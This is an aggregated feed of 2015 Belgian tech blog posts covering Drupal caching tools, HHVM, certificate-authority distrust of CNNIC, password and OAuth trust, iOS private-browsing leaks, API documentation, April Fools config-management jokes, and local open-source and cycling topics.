Caching means better performance, but it also means that without the correct cacheability metadata, the wrong content may be served to end users: without the right cache contexts, the wrong variation may be sent to a user; without the right cache tags, stale content may be sent to a user. Therefore we should make it as easy as possible to analyze the cacheability of a rendered block, entity (node/user/taxonomy term/…), view, region, menu, and so on.

It should work not only for cacheability metadata, but for all bubbleable metadata [3]: it’d be very valuable to be able to see which part of the page caused an expensive cache context or tag [4], but it’d be at least equally valuable to see which part of the page attached a certain asset [5].

Since bubbling happens across a tree, it’s important to visualize the hierarchy. The best hierarchy visualization I know in the web developer world is the Firefox Developer Tools 3D view.

Firefox 3D view of

I think a tool for visualizing, analyzing and understanding the bubbleable metadata (cache contexts, cache tags, cache max-age, assets) should work in a similar way. The developer should be able to:


So, over the past weekend, I worked on a prototype. I read the CSS Transforms spec [6] and a CSS 3D transforms introduction. As somebody with little CSS knowledge who hasn't touched CSS or 3D programming in years, it was fun to play with this :) The result:

renderviz prototype, visualizing the 'timezone' cache context.

And finally, a short screencast demonstrating it in action:

Give it a try yourself by applying the attached patch to Drupal 8 at commit daf9e2c509149441d4d9a4d1964895179a84a12c and installing the renderviz module.

Want to help?

There are many rough edges — actually there are only rough edges. Everything needs work: CSS, JavaScript, UI (there isn’t any yet!), even the name!

But it’s a lot of fun to work on, and it’s very different from what most of us tend to work on every day. If you’d like to be able to build sites in Drupal 8 with a developer tool like this, please contact me, or leave a comment :)

  1. Avoiding rendering exactly the same chunks of HTML endlessly on every request. See d.o/developing/api/8/render/arrays/cacheability

  2. For more about that, see the Render caching in Drupal 7 and 8 talk I did with Fabian Franz & Marco Molinari at DrupalCon Amsterdam. 

  3. Drupal is all about reusable content and reusable components. That’s why starting in Drupal 8, we don’t attach assets at the page-level (i.e. global), but we attach them to the places where we actually need them (e.g. when rendering a taxonomy term, we attach the assets to style the taxonomy term to the taxonomy term’s render array). They then “bubble” the render tree, just like JavaScript events bubble the DOM tree. The assets bubble all the way to the response level, i.e. to a HTML response’s <head> element. Similarly, cache tags and contexts bubble to a response’s X-Drupal-Cache-Contexts and X-Drupal-Cache-Tags headers. 

  4. A cache tag is expensive if it’s invalidated relatively frequently (which causes all render cache items that have that tag to be invalidated). A cache context is expensive if it causes many variations (for example: per-user caching requires a variation of the render array to be created for every single authenticated user). 

  5. In Drupal 8, all assets are defined in asset libraries, which can contain any number of CSS or JS assets, and which can depend on other asset libraries. See d.o/theme-guide/8/assets

  6. Firefox’ 3D view is built using WebGL, not CSS Transforms. We might eventually need that too, but not just yet. Oh, and for the origins of Firefox’ 3D view, see

by Wim Leers at April 07, 2015 08:37 AM

April 06, 2015

Mattias Geniar

HHVM’s Threading Difference – Not The Same as PHP-FPM

The post HHVM’s Threading Difference – Not The Same as PHP-FPM appeared first on

I'm glad Etsy found this before the rest of us had to.

Most PHP SAPIs are implemented such that each request is handled by exactly one process, with many processes simultaneously handling many requests.

HHVM is a threaded SAPI. HHVM runs as a single process with multiple threads where each thread is only handling exactly one request. When you call setlocale(3) in this context it affects the locale for all threads in that process. As a result, requests can come in and trample the locales set by other requests as illustrated in this animation.
Code as Craft -- Etsy blog

HHVM pays off. It's more than twice as fast as PHP 5.4 in my benchmarks. But it's not a drop-in replacement for PHP-FPM.

As with everything: testing, testing & testing.

The post HHVM’s Threading Difference – Not The Same as PHP-FPM appeared first on

by Mattias Geniar at April 06, 2015 05:02 PM

April 05, 2015

Mattias Geniar

The Irony of Random Passwords For Each Service

The post The Irony of Random Passwords For Each Service appeared first on

It's still better than the same password for every service, of course. But there's a catch.

Shifting Trust

Here's what most websites look like for their users.

+------------+ +                                          
|  facebook  | |                                          
+------------+ |           +-----------------------------+
+------------+ |           |                             |
|  twitter   | +----------->     gmail / hotmail / ...   |
+------------+ |           |                             |
+------------+ |           +-----------------------------+
|  instagram | |                                          
+------------+ +                                          

Nearly every service you sign up to, you use the same e-mail account. Because it's impractical to have a different account for each service.

So you're shifting the Single Point of Failure. It's no longer the same password you use on every website, it's the same e-mail address you use for every website. Password reset mails are all sent to that account.

Sure, a Gmail or Hotmail account is a lot safer if you enable 2-factor authentication. It's especially safer than an account at the next hot startup's own service.

By all means, keep using random passwords for every service you sign up to. But be aware of the implications of using your same e-mail account on every service. Do whatever is possible to protect your e-mail account, as it's a goldmine.

Trusting The Untrustables

Over the last few years, however, another shift has emerged. One with the exact same consequences as the one shown above -- possibly even more dangerous ones.

+------------+ +                                          
|  spotify   | |                                          
+------------+ |           +-----------------------------+
+------------+ |           |                             |
| | | +--------->   facebook / twitter auth   |
+------------+ |           |                             |
+------------+ |           +-----------------------------+
|  ...       | |                                          
+------------+ +                                          

More and more services are offering signups via OAuth, placing the trust of account management and security in the hands of others. Mostly Facebook and Twitter, with GitHub on the rise in the coding and open source community.

No more random passwords for each service. That's a good thing, right?

Now you're placing all your trust into a master password set in your Facebook or Twitter account. If that account is compromised, everything is compromised.

The Future

There's no good solution for this problem. If you're paranoid, make a new email account for every service. Give that new email account a random password. Save it in your memory/brain. Don't trust Password Managers. Don't trust post-its. Don't trust social media oAuth logins.

It's absolutely impractical. There is no proper solution. There's only the least bad one, which is probably to still use a random password for each service.

Oh well.

The post The Irony of Random Passwords For Each Service appeared first on

by Mattias Geniar at April 05, 2015 07:21 PM

April 03, 2015

Mattias Geniar

Hosting Superheroes

The post Hosting Superheroes appeared first on

I'm really excited about this animated video we are launching, to showcase what a Managed Hosting Provider can do.

It's always a bit of a challenge to explain to outsiders what my job entails. Hosting is a wide concept and a complex industry in IT. Hopefully, this small 60s video does a better job at explaining it than we do.

Outsourcing to a managed hosting provider, explained for dummies. I like.

The post Hosting Superheroes appeared first on

by Mattias Geniar at April 03, 2015 10:53 AM

Mozilla Blocking CNNIC’s CA Too

The post Mozilla Blocking CNNIC’s CA Too appeared first on

So it isn't just Google.

Sucks if you're ordering your certificates through one of their intermediates, and being duped because of this.

... after public discussion and consideration of the scope and impact of a range of options, we have decided to update our code so that Mozilla products will no longer trust any certificate issued by CNNIC’s roots with a notBefore date on or after 1st April 2015.

Distrusting New CNNIC Certificates


The chain of trust is only as strong as its weakest link. Especially with Certificate Authorities.

The post Mozilla Blocking CNNIC’s CA Too appeared first on

by Mattias Geniar at April 03, 2015 08:06 AM

Frank Goossens

WP YouTube Lyte 1.6.0: the one with the other API

I just released WP YouTube Lyte 1.6, featuring the following changes:

Proof that the new player UI looks great:

YouTube Video
Watch this video on YouTube or on Easy Youtube.

If you’re struggling to get a Google API key, there’s extensive information in the FAQ on the why, what & how. WP YouTube Lyte will automatically fall back to the old anonymous API v2 if you don’t provide a key. As API v2 will continue to work for a couple more weeks, all will be fine. I am, in the meantime, working on a separate plugin that will automatically provide an API key for WP YouTube Lyte to use (and which might offer other extras in the future). You can contact me if you would be interested in test-driving that service plugin.

by frank at April 03, 2015 05:19 AM

April 02, 2015

LOADays Organizers

LPI @ Loadays

As in previous years, the Linux Professional Institute (LPI) wants to offer paper-based (PBT) LPI exams at Loadays.

LPI Certifications are globally accepted certifications that are:

At Loadays we want to offer certification for:

by Loadays Crew at April 02, 2015 10:00 PM

Mattias Geniar

Google’s War on China

The post Google’s War on China appeared first on

The timing of this is no accident. Google is pulling one of China's biggest Certificate Authorities from its products.

Update -- April 1: As a result of a joint investigation of the events surrounding this incident by Google and CNNIC, we have decided that the CNNIC Root and EV CAs will no longer be recognized in Google products.
Google Online Security

This reaction is the result of one of CNNIC's (China Internet Network Information Center) intermediates falsely issuing certificates for Google domains.

So what do you do if one of the 3 major browsers in existence blocks your certificates, and thus your entire business? You reply. With a 2-line statement.

The decision that Google has made is unacceptable and unintelligible to CNNIC, and meanwhile CNNIC sincerely urge that Google would take users’ rights and interests into full consideration.
CNNIC's Announcement

The irony is that Google actually did consider their users' rights. That's why they're blocking the CA.

I don't think it's a coincidence Google is doing this just a few days after the largest DDoS Github ever faced was tracked back to a man-on-the-side attack launched from China.

If it isn't a cyber war yet, it soon will be.

The post Google’s War on China appeared first on

by Mattias Geniar at April 02, 2015 01:52 PM

April 01, 2015

Philip Van Hoof


Its a mythical beast that speaks in pornographic subplots and maintains direct communication with your girlfriends every wants and desires so as better to inform you on how to best please her. It has the feet of bonzi buddy, the torso of that man who uses 1 weird trick to perfect his abs, and the arms of the scientists that hate her. Most impressively, Maalwarkstrodon has a skull made from a Viagra, Levitra, Cialis, and Propecia alloy. This beast of malware belches sexy singles from former east-bloc soviet satellite states and is cloaked in the finest fashions from paris and milan, imported directly from Fujian china.

Maalwarkstrodon is incapable of offering any less than the best deals at 80% to 90% off, and will not rest until your 2 million dollar per month work-at-home career comes to fruition and the spoils of all true nigerian royalty are delivered unto those most deserving of a kings riches.

Maalwarkstrodon will also win the malware arms race.

by admin at April 01, 2015 10:32 PM

Mattias Geniar

µPuppet & Ensible

The post µPuppet & Ensible appeared first on

The future of config management has arrived.

Tiny-puppet burdens you with having to pass in parameters to configure your servers.

If you are a beginner, how will you ever figure out what those parameters even mean? With micro puppet you no longer need to pass in those pesky parameters. Micro puppet uses puppet's built-in DSL technology and code evaluation to introspect the environment and auto-populate those hash rockets for you. It's like magic! But we call it syntactic sugar.


It takes Tiny Puppet further, to its ultimate goal. I've been blind for not having seen this coming.

And to spearhead the competition with µPuppet, there's now Ensible. A European fork of Ansible with very clear goals.

Ensible is a radically simple IT automation system. It handles configuration-management, application deployment, cloud provisioning, ad-hoc task-execution, and multinode orchestration -- including trivializing things like zero downtime rolling updates with load balancers.


Screw containers.

The future is µPuppet and Ensible, combined. Managing the same resources, because they both add value.

The post µPuppet & Ensible appeared first on

by Mattias Geniar at April 01, 2015 08:32 PM

Frank Goossens

Music from Our Tube: Young Fathers getting up

Young Fathers is, according to Wikipedia, an alternative hip-hop group based in Edinburgh, Scotland. But who cares about such silly trivia when you can just listen to their “Get Up” instead?

YouTube Video
Watch this video on YouTube or on Easy Youtube.

by frank at April 01, 2015 04:03 AM

March 31, 2015

Dries Buytaert

Content platform + user platform = BOOM!

Here is a very simple thesis on how to disrupt billion dollar industries:

Content platform + user platform = BOOM!

That is a bit cryptic, so let me explain.

Traditional retailers like RadioShack and Barnes & Noble were great "content platforms"; they have millions of products on shelves across thousands of physical stores. Amazon disrupted them by moving online, and Amazon was able to build an even better content platform with many more products. In addition, the internet enabled the creation of "user platforms". Amazon is a great user platform as it knows the interests of the 250 million customers it has on file; it uses that customer information to recommend products to buy. Amazon built a great content and user platform.

Businesses with a content platform that aren't investing in a user platform will most likely get disrupted. To understand why user platforms matter, take a look at a traditional media company like The New York Times -- one of the world's best content platforms, both online and offline. But it's also one of the world's poorest user platforms; they don't have a 1-on-1 relationship with all their readers. By aggregating the best content from many different sources, Flipboard is as good of a content platform as The New York Times, if not better. However, Flipboard is a much better user platform because all of its readers explicitly tell Flipboard what they are interested in and Flipboard matches content to users based on their interest. For The New York Times to survive, their strategy should be to invest in a better user platform: they should spend more time getting to know every single reader and serving curated content that matches the user's interest. The New York Times seems well aware of this problem, with its decision last week to host its articles directly on Facebook to get access to Facebook's user platform with 1.4 billion users.

Similarly, Netflix is disrupting both traditional broadcasters and cable companies because they built a great user platform capable of matching movies and shows to users. To many Netflix users' frustrations, traditional TV broadcasters still have the better content platform, but that hasn't stopped the growth of Netflix. Furthermore, Netflix is investing heavily in becoming a better content platform by producing their own shows, including original series such as House of Cards and Orange Is the New Black. Unless traditional broadcasters invest in becoming great user platforms and matching content to users, they risk losing against Netflix.

The challenge for newspaper organizations or cable providers is usually not with the technical evolution, but with changing their business model. Take the cable providers, for example. Legacy constraints like distribution models, FCC regulations and broadcast spectrum requirements prevent them from moving as fast in this direction as a Netflix might. Fortunately for most cable providers, they are also the internet providers, which allows them to become user platforms if they too can master the personalization and contextualization equation.

Facebook, Twitter and Google are some of the world's best user platforms; they know about their users' likes and dislikes, their location, their relationships and much more. For them, the opportunity is to become better content platforms and to match users with relevant products and articles. By organizing the world's information, Google is building a massive content platform, and by launching services like Gmail, Google+, Google Ads, Google Fiber and Google Wallet, they are building a massive user platform. Given that they have the world's largest content platform and the richest user platform, I have no doubt that Google could dominate the web the next couple of decades.

The examples above are focused on print media, television and radio, but the thinking can easily be extended to commerce, manufacturing, education, and much more. The thesis of content platforms adding user platforms (or vice versa) is very basic but also very powerful. Adding user platforms to existing content platforms enables a transformative change in the customer's user experience: content can find you, rather than you having to find content. Furthermore, brands are able to establish a 1-on-1 relationships with their customers allowing them to interact with them in a way they were never able to in the past. By establishing 1-on-1 relationships with their customers, brands will be able to "jump over" the traditional distribution channels. If we've learned one thing in the short history of the internet, it is that jumping over middlemen is a well-known recipe for success.

Anyone building a digital business should at least consider investing in building both a better content platform and a better user platform. It's no longer just about publishing content; it's about understanding what uniquely delights each user and using that information to manage the entire experience of a site visitor or customer over time. The idea of using interests, location, user feedback, past behavior and contextual information to deliver the best user experience is no longer a nice-to-have; it is becoming a make-or-break point. It is the next big challenge and opportunity for everyone building digital experiences. This is why I'm passionate about content management systems needing to evolve to digital experience management systems and why Acquia has spent the last two years building software that helps organizations build user platforms. As I talked and wrote about years ago, I believe personalization and contextualization will be a critical building block of the future of the web, and I'm excited to help make that a reality.

by Dries at March 31, 2015 08:05 PM

Mattias Geniar

Obsessive Efficiency Disorder

The post Obsessive Efficiency Disorder appeared first on

It's a bit like OCD, but more efficient.[1]

Having had a few talks with colleagues about this, it's clear I'm not alone. In fact, many of us who are working at a high pace and functioning at a high level seem to experience this.

We have the need to constantly find the most efficient way to get a task done. No matter how small or big the task is.

Small Efficient Routines

I notice this behaviour mostly in my common routines. The little things you repeat on a daily basis.

For instance, it takes around 1 minute for my coffee to be ready at the office. The machine also needs a 10-15 second warm-up, when it hasn't been powered on yet for the day.

So that leaves me with 2 options: I either wait for my coffee to be ready and continue my day, or I try to be more efficient. I chose the latter. Those 60 seconds during which my coffee is carefully prepared, I can setup my laptop, start unloading the dishwasher, ...


I just saved around 60 seconds.

Looks ridiculous, right?

Optimise Everything

The coffee example is perhaps an obvious one. If there are tasks in my day that take more than 15 seconds, I'll probably do something else in the meanwhile. The delays are small enough that they don't warrant a multi-hour project to automate them entirely, so I have to deal with the waiting.

For instance, this is my typical "git commit && git push" routine: committing code, pushing it upstream and starting a Pull Request.


Normally, one would run git commit, wait for the pre-commit hook to validate everything, then browse to the git repo and start the PR. Instead, as soon as the git commit is typed, I start working on the PR text.

There's no reason that should have to wait until my pre-commit hook is done. Especially since I'm using a Puppet pre-commit hook that validates a lot, it's too time-consuming to wait on.

Single-tasking vs. Multitasking

I look for those kinds of multitasking routines everywhere. But I don't like to consider it multitasking. It's more like sequential single-tasking: you leave a task alone and start another one that takes just enough time to fill the gap.

There is a rule, though: the secondary task needs to be finished within that time period. I need to be able to put it out of my head as soon as it's done. That way, I don't get distracted by too many tasks actually running at the same time.

This is micro-optimisation. All day long.

ADHD vs. Concentration

You may think of this as some form of ADHD. Well, it isn't.

I deliberately choose to start a new, small task during my waits. Tasks that I know I can finish during that timeframe. I'm not distracted, just highly focused on getting it done. It even acts like a personal deadline: I know how much time task A will keep me waiting, so whichever task B I start in the meantime needs to be finished before task A requires my attention again.

You're Nuts

I don't think so. In fact, I believe many people in IT are doing this exact same thing.

It comes from necessity. Most of us have extremely busy jobs and schedules. We need ways to optimise the time we spend every day, to make the most out of it.

If you've already improved or automated the big inefficient tasks in life, then what's left besides a lot of small tasks in which to find more efficient methods?

Distractions Are Killers

This kind of jumping from task to task does take its toll. If you're distracted halfway through a routine, it can end up taking more time than doing each task sequentially. A coworker asking a question, a push notification on your phone, an e-mail popup on the desktop, ... a lot of things can interfere with your flow.

I find that if I'm in my zone and actively blocking outside distractions, this constant switching between small tasks to fill the waiting gaps helps me get a lot more done in a day. It takes more energy and more focus, but that's exactly the kind of tradeoff I'm looking to make.

[1] A joke, obviously.

The post Obsessive Efficiency Disorder appeared first on

by Mattias Geniar at March 31, 2015 06:00 PM

March 30, 2015

Luc Stroobant

Cycling policy is more than sawing off bollards

In November, after about three years of being annoyed at how life-threateningly the bike path on the Tweestationsstraat in Anderlecht ends, I posted the following tweet.

All the politicians addressed responded that the situation is unacceptable (Pascal Smet, who is politically responsible, was unfortunately not on Twitter). We are now four months on, and I do know that politics in Brussels gets things moving very slowly. But what rather annoys me is that they apparently can respond quickly when a video about dangerous bollards goes viral. Dear Brussels politicians: sawing off a few bollards does nothing about the very dangerous situations on several essential access roads between the large and the small ring. If you really want fewer traffic jams and want to get people on bikes, do something about those!

When I then read sentences like "The administration is doing its job and has employed a bike path inspector since 2013", my toes curl completely. Does that inspector ever get outside the city centre? Does he or she cycle? Has he or she ever wondered, on the Tweestationsstraat, why so many cyclists ride on the already very busy sidewalk there? In Brussels the law of the strongest simply applies: cars take up all the space, so cyclists are left with the choice between the traffic jam or the sidewalk. Sorry, dear pedestrian.
But would it really be such a disaster if, on those last 600 metres between the centre and the end of the existing bike path, we replaced one traffic lane with a bike path and shifted the traffic jam that always stands there anyway 500 metres towards Anderlecht industrie? Maybe you could even convince a few people in the traffic jam to take the bike once they no longer have to bridge that insane last stretch? Because a bike path on the small ring is nice, but whoever comes from outside it also has to get there without getting killed.

With hopeful greetings from a cyclist with a metal plate and 12 screws in his upper arm. With thanks to the "bike-friendly" renovated Gentsesteenweg in Sint-Agatha-Berchem.


by luc at March 30, 2015 05:36 PM

March 29, 2015

Ruben Vermeersch

An API is only as good as its documentation.

Your APIs are only as good as the documentation that comes with them. Invest time in getting docs right. — @rubenv on Twitter

If you are in the business of shipping software, chances are high that you’ll be offering an API to third-party developers. When you do, it’s important to realize that APIs are hard: they don’t have a visible user interface and you can’t know how to use an API just by looking at it.

For an API, it’s all about the documentation. If an API feature is missing from the documentation, it might as well not exist.

Sadly, very few developers enjoy the tedious work of writing documentation. We generally need a nudge to remind us about it.

At Ticketmatic, we promise that anything you can do through the user interface is also available via the API. Ticketing software rarely stands alone: it’s usually integrated with e.g. the website or some planning software. The API is as important as our user interface.

To make sure we consistently document our API properly, we’ve introduced tooling.

Similar to unit tests, you should measure the coverage of your documentation.

After every change, every bit of an API endpoint (a method, a parameter, a result field, …) is checked and cross-referenced with the documentation, to make sure a proper description and instructions are present.

The end result is a big documentation coverage report which we consider as important as our unit test results.

Constantly measure and improve the documentation coverage metric.
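As a sketch of how such tooling can work (the names below are hypothetical, not Ticketmatic's actual code): treat the API surface as a set of items, check each one for a description, and report the ratio.

```python
# Hypothetical documentation-coverage check: cross-reference each API item
# (endpoint, parameter, result field, ...) with its description and report
# the fraction that is properly documented.

def doc_coverage(api_items: dict) -> float:
    """Return the fraction of API items that carry a non-empty description."""
    if not api_items:
        return 1.0
    documented = sum(1 for desc in api_items.values() if desc and desc.strip())
    return documented / len(api_items)

endpoints = {
    "GET /events": "List all events.",
    "GET /events/{id}": "Fetch a single event.",
    "POST /events": "",  # missing description: counts against coverage
}

print(f"documentation coverage: {doc_coverage(endpoints):.0%}")
```

Failing the build when this metric drops works just like failing it on unit test coverage.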

More than just filling fields

A very important point was raised while circulating these thoughts on Twitter.

Shaun McCance (of GNOME documentation fame) correctly remarked:

@rubenv I’ve seen APIs that are 100% documented but still have terrible docs. Coverage is no good if it’s covered in crap. — @shaunm on Twitter

Which is 100% correct. No amount of metrics or tooling will guarantee the quality of the end result. Keeping quality up is a moral obligation shared by everyone on the team, and that can never be replaced with software.

Nevertheless, getting a slight nudge to remind you of your documentation duties never hurts.

Comments | @rubenv on Twitter

March 29, 2015 09:39 AM

March 28, 2015

Les Jeudis du Libre

Mons, April 23 – Tulip: an open-source data visualization application

This Thursday, April 23, 2015 at 7 p.m., the 38th Mons session of the Jeudis du Libre de Belgique will take place.

The topic of this session: Tulip, an open-source data visualization application

Theme: Big data

Audience: everyone

Speaker: David Auber (LaBRI, Université Bordeaux I)

Venue of this session: Université de Mons, Faculté Polytechnique, Site Houdain, Rue de Houdain 9, auditorium 12 (see this map on the UMONS website, or the OSM map). Enter through the main door, at the back of the courtyard of honour. Follow the signs from there.

Participation is free and only requires registering by name, preferably in advance, or at the entrance to the session. Please indicate your intention by registering via the page. The session will be followed by a friendly drink (everything will be finished by 10 p.m. at the latest).

The Jeudis du Libre in Mons also enjoy the support of our partners: CETIC, Normation, OpenSides, MeaWeb, NextLab, Phonoid and Creative Monkeys.

If you are interested in this monthly series, don't hesitate to consult the agenda and to subscribe to the mailing list in order to systematically receive the announcements.

As a reminder, the Jeudis du Libre are meant to be spaces for exchange around Free Software topics. The Mons meetings take place every third Thursday of the month (with exceptions, as is the case this time), and are organized on the premises of, and in collaboration with, Mons-based colleges and university faculties involved in the training of computer scientists (UMONS, HEH and Condorcet), with the support of the non-profit LoLiGrUB, which is active in the promotion of free software.

Description: Tulip is an open-source application dedicated to data analysis and visualization. Its goal is to provide developers with a complete library for building interactive data visualizations. In this presentation we will detail the application's capabilities by presenting its data storage model, its algorithms and its visualizations. We will also cover the application's extension possibilities through its plugin mechanism and the Python development environment integrated into it.

by Didier Villers at March 28, 2015 04:19 PM

March 27, 2015

Philip Van Hoof

It’s not the despair, Laura.

I can take the despair. It's the hope I can't stand. ~ Brian Stimpson, Clockwise

by admin at March 27, 2015 11:49 PM

Les Jeudis du Libre

Arlon, April 2: first session and getting acquainted

The non-profit 6×7 is embarking on the Jeudis du Libre adventure and is scheduling its first edition of these Jeudis du Libre in Arlon as an introduction to this ecosystem, this Thursday, April 2, 2015 at 7 p.m.

We will touch on the main topics: what Free Software is, what it looks like, how to participate, how to make it your own.

Join us this Thursday for this first meeting. Whether you are a novice or an enthusiast, your ideas will steer our next gatherings!

Registration and further information on this page.

by Didier Villers at March 27, 2015 07:30 PM

March 26, 2015

Paul Cobbaut

black beer

There is always room for beer (linky).

Inglorious Quad : excellent !
Oesterstout: excellent !
Embrasse: very good.
Zumbi: excellent !
Barbe Noire: very good.

by Paul Cobbaut ( at March 26, 2015 09:12 PM

Frank Goossens

Music from Our Tube; Bela Lugosi’s dead by lots of guys

Bela Lugosi’s Dead is one of the most famous Bauhaus tracks and is (according to Wikipedia) often considered the first gothic rock record ever released. But here you can see and hear a live version by TV on the Radio, Trent Reznor (Nine Inch Nails) and Bauhaus’ Peter Murphy himself. Great stuff!

Watch this video on YouTube or on Easy Youtube.

by frank at March 26, 2015 04:05 PM

March 25, 2015

Mattias Geniar

Belgium Leader in IPv6 Adoption

The post Belgium Leader in IPv6 Adoption appeared first on

According to Akamai, at least.

European countries continued to be heavily dominant, taking 8 of the 10 spots. Newcomer Norway, with an 88% quarter-over-quarter jump in IPv6 traffic, pushed France out of the top 10.

Belgium again maintained its clear lead, with 32% of content requests made over IPv6 — more than double the percentage of second-place Germany.

Source: akamai’s [state of the internet] 2014

10 points to Belgium! More than 30% of all requests to Akamai are running over IPv6. That's impressive.

IPv6 Traffic Percentage, Top Countries/Regions

Worldwide, Telenet, Brutele and Belgacom are all present in the top 20.


IPv6 adoption is really speeding up in Belgium.

The post Belgium Leader in IPv6 Adoption appeared first on

by Mattias Geniar at March 25, 2015 03:45 PM

March 24, 2015

Frank Goossens

iBert dreams: abolish the NMBS!

(Pictured: a non-self-driving pesero.) One has to dare to dream! Bert Van Wassenhove did just that, and in his piece "Laat ons een begin maken met de ontmanteling van de NMBS" ("Let's make a start on dismantling the NMBS") he proposes, as befits an innovation-minded entrepreneur, to replace trains with self-driving vans from Google, Apple, BMW or Tesla.

The core of his argument (my summary; do read the article itself):

The NMBS costs too much and travellers are dissatisfied because of delays and other problems. So apparently the train cannot solve our mobility problems. After all, the railways are a concept from the industrial revolution, because we long ago stopped all driving to one office building or factory next to a station in Brussels. Today there are other revolutions at hand that can bring a solution: self-driving vans that, like the peseros in Mexico City, pick up travellers wherever demand is highest, driven entirely by the free market.

I wrote (part of) this blog post on the early double-decker between Lokeren and Brussels. Occupancy: roughly 1,000 commuters. We are obviously not the only train running to and from Brussels; figures from 2013 give a daily average of 180,000 boarding passengers in the Brussels stations, and most of them (120,000?) no doubt have to get off there during the peak hours and get back on for the return trip. According to other figures, Brussels counts 330,000 commuters in total, who thus come by public transport or by car. You don't need elaborate transport-economic analyses to conclude that a very large group of people still has to travel en masse "to one office building or factory next to a station in Brussels", and that without the train nearly half again as many cars would be driving in and around Brussels. According to statbel's figures, the train moreover carries more passengers year after year, rising from 144 to 224 million passengers between 1997 and 2010. That counts for something, as a (significant contribution to) easing the mobility problem? The downside: just like road traffic, the train is oversaturated during peak hours, and that does indeed cause quite a few problems.

With those figures for the required (peak) capacity in mind, deploying peseros, self-driving or not, seems a utopia: dropping off and picking up 120,000 people in Brussels, at a capacity of say 10 passengers per van, quickly amounts to 12,000 extra vans in and around Brussels during the morning and evening peaks. If, as Bert proposes, we replaced one train route with a fleet of peseros as a test and applied that to "my" line (Sint-Niklaas -> Brussels -> Kortrijk), then for the sub-route up to and including Brussels alone, 100 vans would have to run to get the 1,000 peak-hour commuters into the capital. I don't know about you, but I would rather not test the impact of that on mobility in practice.

But Bert's article is not without merit: while 100 peseros carrying those ex-train passengers from Sint-Niklaas, Lokeren and Dendermonde would only make the traffic-jam problem worse, those same 100 self-driving vans could also replace 1,000 passenger cars and thus make the roads considerably less busy. Now that would be a contribution to solving the mobility problem!

That leaves the problem of large groups of people who have to be in roughly the same place at roughly the same time, and here we arrive at the dream Bert already sees as reality: what if we indeed no longer all had to come to one office building or factory next to a station in Brussels? Because (even) more working from home, decentralized or locally, is indeed the only fundamental solution to the peak-hour capacity problems of both the roads and the railways. How can we convince large and smaller companies and their employees of that? Maybe that is precisely Bert's ultimate goal: make the problem worse by abolishing the railways, in order to force a change of mentality? A cunning dreamer, that iBert!

by frank at March 24, 2015 06:18 AM

March 23, 2015

Mattias Geniar

When Private Browsing Isn’t Private On iOS: HTML5 And AirPlay

The post When Private Browsing Isn’t Private On iOS: HTML5 And AirPlay appeared first on

Private Browsing: the illusion of privacy.

This applies to mobile devices that run iOS (iPhone, iPad). They have a peculiar way of handling a "private" session.


Shared HTML5 Storage

It's actually explained in the incognito FAQ: HTML5 storage on those iOS devices has a shared state. Everything stored in HTML5 storage in Incognito Mode can be accessed in normal mode.

... regular and incognito mode tabs share HTML5 local storage in iOS devices. HTML5 websites can access their data about your visit in this storage area.

Source: Browse in private

This mostly shows when websites use HTML5 local storage for searchbox completion or to store the session state of games. In most common use cases, you won't notice, mainly because HTML5 local storage isn't that widely adopted yet.

AirPlay Cache

Apple devices have the ability to use AirPlay to stream audio and video to a remote receiver, like a stereo (Airport Express) or a TV (Apple TV).

When you start such a session in Incognito Mode and stream your audio or video, and later close that session, the AirPlay cache will still hold the filename/title of the media item you most recently played.

For instance, if you play Psy's Gangnam Style on an iOS device in Incognito Mode, close the tab and continue browsing in Regular Mode, the AirPlay info screen will still show you the filename/title of the video last played.


This meta info of the media played is only removed after you forcefully close the browser.


Closing the tab isn't enough. This meta info will also be broadcast to any remote device you have connected, be it an Apple TV, Airport Express or in-car entertainment that syncs with AirPlay.

It Could Be Worse

Sure, it's not as bad as storing Incognito URLs in a plain DB file like Safari does, but it just goes to show: Incognito Mode isn't really incognito. It's perfect for testing websites in a fresh environment, though.

Regardless of server-side user matching, man-in-the-middle proxies and network sniffers, even local devices can't separate regular vs. incognito mode properly. Don't use Incognito Mode for anything you don't want people to know. Expect, one day, to see your incognito browsing habits made public.

Make sure you don't have to be (too) ashamed.

The post When Private Browsing Isn’t Private On iOS: HTML5 And AirPlay appeared first on

by Mattias Geniar at March 23, 2015 09:10 PM

March 22, 2015

Mattias Geniar

Life Without Ops

The post Life Without Ops appeared first on

Have you ever done a Puppet run with the --noop option? It does what the name implies: nothing.

Use 'noop' mode where the daemon runs in a no-op or dry-run mode. This is useful for seeing what changes Puppet will make without actually executing the changes.

This is exactly what happens if you have no Ops. Nothing.

Startup Mentality

Not everyone is the same. Neither is every startup. However, I see more and more startups misinterpreting what DevOps is all about. They are publicly looking to hire Developers with a bit of sysadmin knowledge, and expect that to be DevOps.

That's like asking a carpenter to also fix your leaky plumbing.

DevOps isn't about developers doing your system administration. Neither is it letting your sysadmins perform development related tasks. You can have the DevOps spirit and still have those 2 perfectly defined job roles.

DevOps, however, preaches communication. Breaking silos. Having Dev and Ops work together. Learning from each other. Complementing each other. Not doing each other's work.

Why Ops Exist

It's so easy to implement some complex Puppet modules and have them working. But do you know what you're doing? What happens when your downloaded modules fail on you, and a few months in, your Elasticsearch suddenly breaks? Or you've reached the limits of your MongoDB setup? Or you suddenly realise Redis is single-threaded?

This is what Ops are for. They've fought the battle. They know what the bottlenecks are, because they've experienced them. Server-side. They know what happens to the network, the disk I/O, the memory and the CPU cycles whenever you reindex your SOLR cores.

This isn't knowledge to take for granted. You can't expect a fulltime developer, with basic knowledge of systems administration, to have the same level of experience. And maybe you don't expect it. Maybe it's OK in the first few months.

But here's my plea I'm hoping you'll understand: go take advice from experienced system administrators. Find someone with battle scars, who's walked the walk. If you can't find it in-house, consider outsourcing. Or plain one-off consultancy.

There's a reason Ops exist. It isn't to cost you money, it's to help you save money in the long run.

The post Life Without Ops appeared first on

by Mattias Geniar at March 22, 2015 08:11 PM

Silly Little IP Tricks

The post Silly Little IP Tricks appeared first on

I'll show you a few things you can do with IP addresses that you may not know yet. They aren't new -- they're just part of the RFC -- but you don't encounter them that often.

Octal values

For instance, did you know that if you prefix an octet of an IP address with a 0, it gets treated as an octal value? Spot the conversion in the ping below.

$ ping
PING ( 56 data bytes
Request timeout for icmp_seq 0

You would've expected the ping request to go to the IP ending in .36; instead it went to .30. Why? Because 036 is actually the octal notation for the decimal 30.
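If you want to double-check that conversion without pinging anything, the octal arithmetic is easy to reproduce (a quick sketch in Python):

```python
# A leading zero makes an octet octal: "036" is parsed in base 8,
# which is why the ping above went to .30 instead of .36.

print(int("036", 8))   # octal 36 -> decimal 30
print(int("0300", 8))  # octal 300 -> decimal 192
```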

Straight Up Integers

